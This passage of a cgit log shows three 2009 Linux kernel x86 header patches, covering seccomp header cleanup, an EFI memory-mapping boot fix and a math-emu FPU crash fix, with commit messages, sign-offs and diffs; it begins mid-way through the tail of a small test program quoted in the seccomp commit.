	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
---
 arch/x86/include/asm/seccomp_32.h | 6 ------
 arch/x86/include/asm/seccomp_64.h | 8 --------
 2 files changed, 14 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/seccomp_32.h b/arch/x86/include/asm/seccomp_32.h
index a6ad87b352c..b811d6f5780 100644
--- a/arch/x86/include/asm/seccomp_32.h
+++ b/arch/x86/include/asm/seccomp_32.h
@@ -1,12 +1,6 @@
 #ifndef _ASM_X86_SECCOMP_32_H
 #define _ASM_X86_SECCOMP_32_H
 
-#include <linux/thread_info.h>
-
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on i386"
-#endif
-
 #include <linux/unistd.h>
 
 #define __NR_seccomp_read __NR_read
diff --git a/arch/x86/include/asm/seccomp_64.h b/arch/x86/include/asm/seccomp_64.h
index 4171bb794e9..84ec1bd161a 100644
--- a/arch/x86/include/asm/seccomp_64.h
+++ b/arch/x86/include/asm/seccomp_64.h
@@ -1,14 +1,6 @@
 #ifndef _ASM_X86_SECCOMP_64_H
 #define _ASM_X86_SECCOMP_64_H
 
-#include <linux/thread_info.h>
-
-#ifdef TIF_32BIT
-#error "unexpected TIF_32BIT on x86_64"
-#else
-#define TIF_32BIT TIF_IA32
-#endif
-
 #include <linux/unistd.h>
 #include <asm/ia32_unistd.h>
 
-- 
cgit v1.2.3


From dd39ecf522ba86c70809715af46e6557f6491131 Mon Sep 17 00:00:00 2001
From: Huang Ying <ying.huang@intel.com>
Date: Wed, 4 Mar 2009 10:58:33 +0800
Subject: x86: EFI: Back efi_ioremap with init_memory_mapping instead of
 FIX_MAP

Impact: Fix boot failure on EFI system with large runtime memory range

Brian Maly reported that some EFI system with large runtime memory
range can not boot. Because the FIX_MAP used to map runtime memory
range is smaller than run time memory range.

This patch fixes this issue by re-implement efi_ioremap() with
init_memory_mapping().

Reported-and-tested-by: Brian Maly <bmaly@redhat.com>
Signed-off-by: Huang Ying <ying.huang@intel.com>
Cc: Brian Maly <bmaly@redhat.com>
Cc: Yinghai Lu <yinghai@kernel.org>
LKML-Reference: <1236135513.6204.306.camel@yhuang-dev.sh.intel.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/efi.h       | 2 --
 arch/x86/include/asm/fixmap_64.h | 4 ----
 2 files changed, 6 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/efi.h b/arch/x86/include/asm/efi.h
index ca5ffb2856b..edc90f23e70 100644
--- a/arch/x86/include/asm/efi.h
+++ b/arch/x86/include/asm/efi.h
@@ -37,8 +37,6 @@ extern unsigned long asmlinkage efi_call_phys(void *, ...);
 
 #else /* !CONFIG_X86_32 */
 
-#define MAX_EFI_IO_PAGES	100
-
 extern u64 efi_call0(void *fp);
 extern u64 efi_call1(void *fp, u64 arg1);
 extern u64 efi_call2(void *fp, u64 arg1, u64 arg2);
diff --git a/arch/x86/include/asm/fixmap_64.h b/arch/x86/include/asm/fixmap_64.h
index 00a30ab9b1a..8be740977db 100644
--- a/arch/x86/include/asm/fixmap_64.h
+++ b/arch/x86/include/asm/fixmap_64.h
@@ -16,7 +16,6 @@
 #include <asm/apicdef.h>
 #include <asm/page.h>
 #include <asm/vsyscall.h>
-#include <asm/efi.h>
 
 /*
  * Here we define all the compile-time 'special' virtual
@@ -43,9 +42,6 @@ enum fixed_addresses {
 	FIX_APIC_BASE,	/* local (CPU) APIC) -- required for SMP or not */
 	FIX_IO_APIC_BASE_0,
 	FIX_IO_APIC_BASE_END = FIX_IO_APIC_BASE_0 + MAX_IO_APICS - 1,
-	FIX_EFI_IO_MAP_LAST_PAGE,
-	FIX_EFI_IO_MAP_FIRST_PAGE = FIX_EFI_IO_MAP_LAST_PAGE
-				  + MAX_EFI_IO_PAGES - 1,
 #ifdef CONFIG_PARAVIRT
 	FIX_PARAVIRT_BOOTMAP,
 #endif
-- 
cgit v1.2.3


From ab9e18587f4cdb5f3fb3854c732f27a36f98e8f6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Daniel=20Gl=C3=B6ckner?= <dg@emlix.com>
Date: Wed, 4 Mar 2009 19:42:27 +0100
Subject: x86, math-emu: fix init_fpu for task != current
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Impact: fix math-emu related crash while using GDB/ptrace

init_fpu() calls finit to initialize a task's xstate, while finit always
works on the current task. If we use PTRACE_GETFPREGS on another
process and both processes did not already use floating point, we get
a null pointer exception in finit.

This patch creates a new function finit_task that takes a task_struct
parameter. finit becomes a wrapper that simply calls finit_task with
current. On the plus side this avoids many calls to get_current which
would each resolve to an inline assembler mov instruction.

An empty finit_task has been added to i387.h to avoid linker errors in
case the compiler still emits the call in init_fpu when
CONFIG_MATH_EMULATION is not defined.

The declaration of finit in i387.h has been removed as the remaining
code using this function gets its prototype from fpu_proto.h.

Signed-off-by: Daniel Glöckner <dg@emlix.com>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Pallipadi Venkatesh" <venkatesh.pallipadi@intel.com>
Cc: Arjan van de Ven <arjan@infradead.org>
Cc: Bill Metzenthen <billm@melbpc.org.au>
LKML-Reference: <E1Lew31-0004il-Fg@mailer.emlix.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/i387.h | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/i387.h b/arch/x86/include/asm/i387.h
index 48f0004db8c..71c9e518398 100644
--- a/arch/x86/include/asm/i387.h
+++ b/arch/x86/include/asm/i387.h
@@ -172,7 +172,13 @@ static inline void __save_init_fpu(struct task_struct *tsk)
 
 #else  /* CONFIG_X86_32 */
 
-extern void finit(void);
+#ifdef CONFIG_MATH_EMULATION
+extern void finit_task(struct task_struct *tsk);
+#else
+static inline void finit_task(struct task_struct *tsk)
+{
+}
+#endif
 
 static inline void tolerant_fwait(void)
 {
-- 
cgit v1.2.3